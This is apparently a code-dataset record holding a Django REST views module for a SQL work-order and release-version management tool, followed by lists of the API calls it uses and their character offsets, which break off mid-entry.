sanic_transmute import add_route\n')] |
# -*- coding:utf-8 -*-
# edit by fuzongfei
import base64
import datetime
# Create your views here.
import json
from django.http import Http404, HttpResponse
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from libs import permissions
from libs.Pagination import Pagination
from libs.RenderColumns import render_dynamic_columns
from libs.response import JsonResponseV1
from sqlorders import models, serializers
from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter
class GetDBEnvironment(ListAPIView):
queryset = models.DbEnvironment.objects.all()
serializer_class = serializers.DbEnvironmentSerializer
# 获取工单环境
def get(self, request, *args, **kwargs):
serializer = self.get_serializer(self.get_queryset(), many=True)
return JsonResponseV1(data=serializer.data)
class GetDbSchemas(APIView):
# 获取指定环境指定用途的schemas列表
def get(self, request):
serializer = serializers.DbSchemasSerializer(data=request.query_params)
if serializer.is_valid():
return JsonResponseV1(data=serializer.query)
return JsonResponseV1(message=serializer.errors, code='0001')
class IncepSyntaxCheckView(APIView):
def post(self, request, *args, **kwargs):
serializer = serializers.IncepSyntaxCheckSerializer(data=request.data)
if serializer.is_valid():
s, data = serializer.check()
render_columns = [
{'key': 'order_id', 'value': '序号'},
{'key': 'stage', 'value': '阶段'},
{'key': 'stage_status', 'value': '阶段状态'},
{'key': 'error_level', 'value': '错误级别'},
{'key': 'error_message', 'value': '错误信息', 'width': '35%'},
{'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True},
{'key': 'affected_rows', 'value': '影响/扫描行数'}
]
columns = render_dynamic_columns(render_columns)
message = '语法检查未发现异常,可以提交'
if not s:
message = '语法检查发现异常,详情请查看输出,更正后在提交'
d = {
'status': 0 if s else 1,
'data': data
}
data = {'columns': columns, 'data': d}
return JsonResponseV1(data=data, message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersCommit(GenericAPIView):
permission_classes = (permissions.CanCommitOrdersPermission,)
serializer_class = serializers.SqlOrdersCommitSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="提交成功")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersList(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrdersListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = SqlOrderListFilter
ordering = ['-created_at']
search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'progress', 'value': '进度', 'width': '8%'},
{'key': 'applicant', 'value': '申请人'},
{'key': 'department', 'value': '部门'},
{'key': 'env_name', 'value': '环境'},
{'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True},
{'key': 'sql_type', 'value': '类型'},
{'key': 'remark', 'value': '备注'},
{'key': 'version', 'value': '版本'},
{'key': 'host', 'value': '实例/库'},
{'key': 'auditor', 'value': '审核人'},
{'key': 'reviewer', 'value': '复核人'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class SqlOrdersDetail(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrderDetailSerializer
lookup_field = 'order_id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class OpSqlOrderView(ViewSet):
"""更新SQL工单状态,如:审核,关闭等"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get_obj(self, pk):
try:
obj = models.DbOrders.objects.get(pk=pk)
return obj
except models.DbOrders.DoesNotExist:
raise Http404
def approve(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_approve"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def feedback(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_feedback"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def close(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_close"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def review(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_review"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
class GenerateTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data)
if serializer.is_valid():
data = serializer.save(request)
return JsonResponseV1(data=data)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTaskIdView(APIView):
def get(self, request, *args, **kwargs):
"""根据order id返回taskid"""
order_id = kwargs.get('order_id')
task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id
return JsonResponseV1(data=task_id)
class GetTasksPreviewView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
# 数据隐藏按钮打开了
# 仅允许申请人、审核人、复核人和超权用户查看数据
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
origin_queryset = self.queryset.filter(task_id=task_id)
total = origin_queryset.count()
progress_0 = origin_queryset.filter(progress=0).count()
progress_1 = origin_queryset.filter(progress=1).count()
progress_3 = origin_queryset.filter(progress=3).count()
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
{'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
{'key': 'result', 'value': '查看结果'}, # 自定义result
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns,
'data': {'data': serializer.data,
'total': total,
'progress_0': progress_0,
'progress_1': progress_1,
'progress_3': progress_3}}
return self.get_paginated_response(data)
class GetTasksListView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
# 数据隐藏按钮打开了
# 仅允许申请人、审核人、复核人和超权用户查看数据
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
{'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
{'key': 'execute', 'value': '执行'}, # 自定义execute
{'key': 'result', 'value': '查看结果'}, # 自定义result
]
if queryset.exists():
if queryset.first().sql_type == 'DDL':
render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'})
render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'})
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ExecuteSingleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteSingleTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ExecuteMultiTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteMultiTasksSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ThrottleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ThrottleTaskSerializer(data=request.data)
if serializer.is_valid():
message = serializer.execute(request)
return JsonResponseV1(message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTasksResultView(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.GetTasksResultSerializer
lookup_field = 'id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class HookSqlOrdersView(APIView):
permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission,
permissions.CanViewOrdersPermission,
permissions.CanExecuteOrdersPermission,
permissions.CanAuditOrdersPermission),
)
def post(self, request, *args, **kwargs):
serializer = serializers.HookSqlOrdersSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class DownloadExportFilesView(APIView):
"""下载导出文件"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get(self, request, base64_filename):
file_name = base64.b64decode(base64_filename).decode()
if not models.DbExportFiles.objects.filter(file_name=file_name).exists():
raise Http404
obj = models.DbExportFiles.objects.get(file_name=file_name)
if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username:
raise PermissionDenied(detail='您没有权限')
fsock = open(f"media/{obj.files}", 'rb')
response = HttpResponse(fsock, content_type="application/zip")
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
class ReleaseVersionsGet(APIView):
"""获取上线版本号,提交工单使用"""
def get(self, request):
before_30_days = (timezone.now() - datetime.timedelta(days=30))
queryset = models.ReleaseVersions.objects.filter(
expire_time__gte=before_30_days
).values('id', 'version', 'expire_time').order_by('-created_at')
for row in queryset:
row['disabled'] = 0
if row['expire_time'] < datetime.datetime.date(timezone.now()):
row['disabled'] = 1
return JsonResponseV1(data=queryset)
class ReleaseVersionsList(ListAPIView):
"""获取上线版本号列表,管理上线版本号使用"""
permission_classes = (permissions.CanViewVersionPermission,)
queryset = models.ReleaseVersions.objects.all()
serializer_class = serializers.ReleaseVersionsListSerializer
pagination_class = Pagination
filter_backends = [filters.SearchFilter, filters.OrderingFilter]
search_fields = ['username', 'version', 'expire_time']
ordering = ['-created_at']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'version', 'value': '版本'},
{'key': 'username', 'value': '创建人'},
{'key': 'expire_time', 'value': '截止日期'},
{'key': 'created_at', 'value': '创建时间'},
{'key': 'key', 'value': '操作'},
{'key': 'id', 'value': '详情'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ReleaseVersionsCreate(CreateAPIView):
"""创建版本"""
permission_classes = (permissions.CanCreateVersionsPermission,)
serializer_class = serializers.ReleaseVersionsCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
self.perform_create(serializer)
return JsonResponseV1(message="创建成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsUpdate(UpdateAPIView):
"""更新版本号,该类只更新单条记录"""
permission_classes = (permissions.CanUpdateVersionsPermission,)
def put(self, request, *args, **kwargs):
serializer = serializers.ReleaseVersionsSerializer(
instance=models.ReleaseVersions.objects.get(pk=kwargs['key']), # 返回单条记录
data=request.data
)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="更新成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsDelete(DestroyAPIView):
"""删除版本"""
permission_classes = (permissions.CanDeleteVersionsPermission,)
queryset = models.ReleaseVersions.objects.all()
lookup_field = 'id' # 默认为主键,可不写
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return JsonResponseV1(message="删除成功")
class ReleaseVersionsView(APIView):
"""获取指定版本内工单在所有环境的进度"""
def get(self, request, *args, **kwargs):
# 获取版本对应的主键
version = kwargs.get('version')
version_id = models.ReleaseVersions.objects.get(version=version).pk
# 获取环境,行转为动态列
obj = models.DbEnvironment.objects.values('id', 'name')
row2columns = ''
for row in obj:
row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']},"
# 获取任务下所有工单分别在各个环境中的状态,此处的环境为动态环境
# id没有实际意义
query = f"select " + row2columns + \
f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \
f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant"
rawquery = models.DbOrders.objects.raw(query)
# 获取环境列名
dynamic_columns = list(rawquery.columns)[:-4]
data = []
for row in rawquery:
columns = {
'id': row.id,
'escape_title': row.escape_title,
'order_id': row.order_id,
'applicant': row.applicant,
}
for col in dynamic_columns:
columns[col] = getattr(row, col)
data.append(columns)
render_columns = [
{'key': 'escape_title', 'ellipsis': True, 'value': '标题'},
{'key': 'applicant', 'value': '申请人'},
]
render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns])
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': data}
return JsonResponseV1(data=data)
| [
"sqlorders.models.ReleaseVersions.objects.filter",
"sqlorders.serializers.ExecuteMultiTasksSerializer",
"sqlorders.models.DbEnvironment.objects.all",
"sqlorders.serializers.IncepSyntaxCheckSerializer",
"sqlorders.models.DbOrdersExecuteTasks.objects.filter",
"datetime.timedelta",
"sqlorders.models.ReleaseVersions.objects.get",
"sqlorders.models.DbOrders.objects.get",
"django.http.HttpResponse",
"django.utils.timezone.now",
"sqlorders.serializers.ThrottleTaskSerializer",
"sqlorders.models.DbExportFiles.objects.get",
"sqlorders.models.DbOrdersExecuteTasks.objects.get",
"sqlorders.serializers.DbSchemasSerializer",
"json.loads",
"sqlorders.models.DbEnvironment.objects.values",
"libs.response.JsonResponseV1",
"sqlorders.models.ReleaseVersions.objects.all",
"sqlorders.models.DbExportFiles.objects.filter",
"rest_framework.exceptions.PermissionDenied",
"sqlorders.models.DbOrdersExecuteTasks.objects.all",
"sqlorders.serializers.ExecuteSingleTaskSerializer",
"sqlorders.models.DbOrders.objects.raw",
"sqlorders.serializers.HookSqlOrdersSerializer",
"sqlorders.serializers.GenerateSqlOrdersTasksSerializer",
"sqlorders.models.DbOrders.objects.all",
"base64.b64decode",
"libs.permissions.anyof",
"libs.RenderColumns.render_dynamic_columns"
]
| [((868, 902), 'sqlorders.models.DbEnvironment.objects.all', 'models.DbEnvironment.objects.all', ([], {}), '()\n', (900, 902), False, 'from sqlorders import models, serializers\n'), ((3250, 3279), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ([], {}), '()\n', (3277, 3279), False, 'from sqlorders import models, serializers\n'), ((4754, 4783), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ([], {}), '()\n', (4781, 4783), False, 'from sqlorders import models, serializers\n'), ((8270, 8311), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ([], {}), '()\n', (8309, 8311), False, 'from sqlorders import models, serializers\n'), ((10671, 10712), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ([], {}), '()\n', (10710, 10712), False, 'from sqlorders import models, serializers\n'), ((14235, 14276), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ([], {}), '()\n', (14274, 14276), False, 'from sqlorders import models, serializers\n'), ((16798, 16834), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ([], {}), '()\n', (16832, 16834), False, 'from sqlorders import models, serializers\n'), ((19021, 19057), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ([], {}), '()\n', (19055, 19057), False, 'from sqlorders import models, serializers\n'), ((1109, 1145), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data'}), '(data=serializer.data)\n', (1123, 1145), False, 'from libs.response import JsonResponseV1\n'), ((1253, 1311), 'sqlorders.serializers.DbSchemasSerializer', 'serializers.DbSchemasSerializer', ([], {'data': 'request.query_params'}), '(data=request.query_params)\n', (1284, 1311), False, 'from sqlorders import models, serializers\n'), ((1418, 1472), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (1432, 1472), False, 'from libs.response import JsonResponseV1\n'), ((1579, 1636), 'sqlorders.serializers.IncepSyntaxCheckSerializer', 'serializers.IncepSyntaxCheckSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (1617, 1636), False, 'from sqlorders import models, serializers\n'), ((2598, 2663), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (2612, 2663), False, 'from libs.response import JsonResponseV1\n'), ((3069, 3134), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (3083, 3134), False, 'from libs.response import JsonResponseV1\n'), ((4470, 4508), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (4492, 4508), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((5053, 5089), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data'}), '(data=serializer.data)\n', (5067, 5089), False, 'from libs.response import JsonResponseV1\n'), ((5854, 5908), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (5868, 5908), False, 'from libs.response import JsonResponseV1\n'), ((6360, 6414), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (6374, 6414), False, 'from libs.response import JsonResponseV1\n'), ((6860, 6914), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (6874, 6914), False, 'from libs.response import JsonResponseV1\n'), ((7362, 7416), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (7376, 7416), False, 'from libs.response import JsonResponseV1\n'), ((7588, 7651), 'sqlorders.serializers.GenerateSqlOrdersTasksSerializer', 'serializers.GenerateSqlOrdersTasksSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (7632, 7651), False, 'from sqlorders import models, serializers\n'), ((7791, 7856), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (7805, 7856), False, 'from libs.response import JsonResponseV1\n'), ((8120, 8148), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'task_id'}), '(data=task_id)\n', (8134, 8148), False, 'from libs.response import JsonResponseV1\n'), ((10184, 10222), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (10206, 10222), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((12611, 12649), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (12633, 12649), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((12935, 12993), 'sqlorders.serializers.ExecuteSingleTaskSerializer', 'serializers.ExecuteSingleTaskSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (12974, 12993), False, 'from sqlorders import models, serializers\n'), ((13142, 13207), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (13156, 13207), False, 'from libs.response import JsonResponseV1\n'), ((13383, 13441), 'sqlorders.serializers.ExecuteMultiTasksSerializer', 'serializers.ExecuteMultiTasksSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (13422, 13441), False, 'from sqlorders import models, serializers\n'), ((13590, 13655), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (13604, 13655), False, 'from libs.response import JsonResponseV1\n'), ((13826, 13879), 'sqlorders.serializers.ThrottleTaskSerializer', 'serializers.ThrottleTaskSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (13860, 13879), False, 'from sqlorders import models, serializers\n'), ((14031, 14096), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (14045, 14096), False, 'from libs.response import JsonResponseV1\n'), ((14540, 14576), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data'}), '(data=serializer.data)\n', (14554, 14576), False, 'from libs.response import JsonResponseV1\n'), ((14639, 14819), 'libs.permissions.anyof', 'permissions.anyof', (['permissions.CanCommitOrdersPermission', 'permissions.CanViewOrdersPermission', 'permissions.CanExecuteOrdersPermission', 'permissions.CanAuditOrdersPermission'], {}), '(permissions.CanCommitOrdersPermission, permissions.\n CanViewOrdersPermission, permissions.CanExecuteOrdersPermission,\n permissions.CanAuditOrdersPermission)\n', (14656, 14819), False, 'from libs import permissions\n'), ((15040, 15094), 'sqlorders.serializers.HookSqlOrdersSerializer', 'serializers.HookSqlOrdersSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (15075, 15094), False, 'from sqlorders import models, serializers\n'), ((15233, 15298), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (15247, 15298), False, 'from libs.response import JsonResponseV1\n'), ((15655, 15708), 'sqlorders.models.DbExportFiles.objects.get', 'models.DbExportFiles.objects.get', ([], {'file_name': 'file_name'}), '(file_name=file_name)\n', (15687, 15708), False, 'from sqlorders import models, serializers\n'), ((15936, 15987), 'django.http.HttpResponse', 'HttpResponse', (['fsock'], {'content_type': '"""application/zip"""'}), "(fsock, content_type='application/zip')\n", (15948, 15987), False, 'from django.http import Http404, HttpResponse\n'), ((16616, 16645), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'queryset'}), '(data=queryset)\n', (16630, 16645), False, 'from libs.response import JsonResponseV1\n'), ((17647, 17685), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (17669, 17685), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((18244, 18309), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'code': '"""0001"""', 'message': 'serializer.errors', 'flat': '(True)'}), "(code='0001', message=serializer.errors, flat=True)\n", (18258, 18309), False, 'from libs.response import JsonResponseV1\n'), ((18810, 18875), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'code': '"""0001"""', 'message': 'serializer.errors', 'flat': '(True)'}), "(code='0001', message=serializer.errors, flat=True)\n", (18824, 18875), False, 'from libs.response import JsonResponseV1\n'), ((19236, 19266), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""删除成功"""'}), "(message='删除成功')\n", (19250, 19266), False, 'from libs.response import JsonResponseV1\n'), ((19551, 19600), 'sqlorders.models.DbEnvironment.objects.values', 'models.DbEnvironment.objects.values', (['"""id"""', '"""name"""'], {}), "('id', 'name')\n", (19586, 19600), False, 'from sqlorders import models, serializers\n'), ((20075, 20109), 'sqlorders.models.DbOrders.objects.raw', 'models.DbOrders.objects.raw', (['query'], {}), '(query)\n', (20102, 20109), False, 'from sqlorders import models, serializers\n'), ((20811, 20849), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (20833, 20849), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((20915, 20940), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'data'}), '(data=data)\n', (20929, 20940), False, 'from libs.response import JsonResponseV1\n'), ((1365, 1402), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.query'}), '(data=serializer.query)\n', (1379, 1402), False, 'from libs.response import JsonResponseV1\n'), ((2216, 2254), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (2238, 2254), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((2540, 2582), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'data', 'message': 'message'}), '(data=data, message=message)\n', (2554, 2582), False, 'from libs.response import JsonResponseV1\n'), ((3023, 3053), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""提交成功"""'}), "(message='提交成功')\n", (3037, 3053), False, 'from libs.response import JsonResponseV1\n'), ((5275, 5309), 'sqlorders.models.DbOrders.objects.get', 'models.DbOrders.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (5302, 5309), False, 'from sqlorders import models, serializers\n'), ((5786, 5838), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (5800, 5838), False, 'from libs.response import JsonResponseV1\n'), ((6292, 6344), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (6306, 6344), False, 'from libs.response import JsonResponseV1\n'), ((6792, 6844), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (6806, 6844), False, 'from libs.response import JsonResponseV1\n'), ((7294, 7346), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (7308, 7346), False, 'from libs.response import JsonResponseV1\n'), ((7750, 7775), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'data'}), '(data=data)\n', (7764, 7775), False, 'from libs.response import JsonResponseV1\n'), ((13088, 13126), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""任务提交成功,请查看输出"""'}), "(message='任务提交成功,请查看输出')\n", (13102, 13126), False, 'from libs.response import JsonResponseV1\n'), ((13536, 13574), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""任务提交成功,请查看输出"""'}), "(message='任务提交成功,请查看输出')\n", (13550, 13574), False, 'from libs.response import JsonResponseV1\n'), ((13984, 14015), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'message'}), '(message=message)\n', (13998, 14015), False, 'from libs.response import JsonResponseV1\n'), ((15179, 15217), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""任务提交成功,请查看输出"""'}), "(message='任务提交成功,请查看输出')\n", (15193, 15217), False, 'from libs.response import JsonResponseV1\n'), ((15834, 15866), 